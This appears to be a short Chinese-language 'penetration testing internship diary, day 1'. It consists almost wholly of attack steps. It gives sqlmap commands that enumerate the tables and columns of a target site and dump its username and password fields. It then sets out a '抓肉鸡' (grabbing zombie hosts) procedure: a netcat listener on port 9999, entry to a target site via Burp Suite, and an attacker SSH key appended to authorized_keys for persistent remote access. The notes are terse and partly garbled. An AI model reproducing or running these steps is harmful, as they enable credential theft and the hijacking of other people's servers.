渗透测试实习日记day1
一、sqlmap爆破网站?
得到表
sqlmap -u “含注入点网址” --batch --tables --random-agent
得到列
sqlmap -u “含注入点网址” --batch --columns -T “member” --random-agent
得到字段名
sqlmap -u “含注入点网址” --batch --dump -C “m_username,m_userpass” -T “member”–random-agent
二、抓肉鸡
所用工具burpsuite
1.开启一个终端:远程登录
2. nc -l 9999
根据burpsuite抓包,写入完成后,渗透目标网站
(端口号9999)
3.
ls -a
cd .ssh
ls
cat id_rsa.pub>>authorized_keys
cat authorized_keyscd
.pub写入 echo ‘秘钥’>>authorized_keys
cat authorized_keys
4.
在另一终端:
ssh-keygen -t rsa
authorized_keys
cat authorized_keys
连接